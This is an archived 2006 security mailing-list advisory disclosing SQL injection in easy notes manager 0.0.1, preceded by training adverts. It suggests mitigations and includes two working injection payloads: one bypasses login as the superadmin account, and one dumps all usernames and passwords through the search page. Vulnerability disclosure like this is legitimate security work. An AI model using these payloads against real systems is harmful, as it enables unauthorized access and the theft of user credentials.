Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

easy notes manager sql injection and authentication bypass

from [poplix] Network Security [Permanent Link]
Subject: easy notes manager sql injection and authentication bypass
Date: 29 Oct 2006 04:17:11 -0000 
easy notes manager (eNM) version 0.0.1, available at 
http://217.172.179.216/evandor/html/index.php?id=103 is affected by multiple 
sql injection vulnerability due to a missing check of the user supplied input.
An attacker can bypass the authentication procedure and get a full dump of the 
database tables.



No patches are availble but a possible solution is change the TABLEPREFIX 
variable in config file with a very random one and suppress all error messages 
(and eventually downgrade mysql5 to mysql4).
The vendor has been warned.


proof of concept to bypass authentication:
username: dontcare' and 0=1 union select 
id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email
 from users where login='superadmin
password: a

proof of concept to get a list of all users and passwords:
go to search page and search for: "dontcare')) union select 
0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- "

cheers
-p
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • easy notes manager sql injection and authentication bypass, poplix <=
Previous by Date:  freenews---> fileinclude, MoHaNdKo
Next by Date:  [MajorSecurity Advisory #29]foresite CMS - Cross Site Scripting Issue, admin
Previous by Thread:  freenews---> fileinclude, MoHaNdKo
Next by Thread:  [MajorSecurity Advisory #29]foresite CMS - Cross Site Scripting Issue, admin
Indexes:  [Date] [Thread] [Top] [All Lists]